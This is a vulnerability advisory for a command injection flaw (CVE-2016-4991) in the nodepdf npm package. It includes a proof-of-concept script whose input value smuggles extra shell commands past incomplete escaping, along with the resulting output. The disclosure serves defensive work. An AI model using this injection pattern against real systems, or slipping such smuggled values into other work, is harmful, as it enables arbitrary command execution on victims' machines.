Headline
CVE-2016-4991: CVE-2016-4991: Command injection in NodePDF
Input passed to the Pdf() function is shell escaped and passed to child_process.exec() during PDF rendering. However, the shell escape does not properly encode all special characters, namely, semicolon and curly braces. This can be abused to achieve command execution. This problem affects nodepdf 1.3.0.
Software: nodepdf
Website: https://github.com/TJkrusinski/NodePDF
Input passed to the Pdf() function is shell escaped and passed to child_process.exec() during PDF rendering. However, the shell escape does not properly encode all special characters, namely, semicolon and curly braces. This can be abused to achieve command execution.
This vulnerability was later fixed in the shell-escape library and assigned the identifier CVE-2016-10541.
var nodepdf = require('nodepdf');
var url = ";{echo,hello,world};w";
var filename = "output.pdf";
var pdf = new nodepdf(url, filename, {});
pdf.on('stdout', console.log);
pdf.on('stderr', console.error);
$ npm install [email protected]
$ node render.js
11 incorrect args
hello world
03:31:25 up 19 days, 16 min, 1 user, load average: 0.15, 0.15, 0.10
USER TTY FROM [email protected] IDLE JCPU PCPU WHAT
user pts/0 192.168.1.64 02:38 0.00s 0.31s 0.00s wRelated news
The npm module "shell-quote" 1.6.0 and earlier cannot correctly escape ">" and "<" operator used for redirection in shell. Applications that depend on shell-quote may also be vulnerable. A malicious user could perform code injection.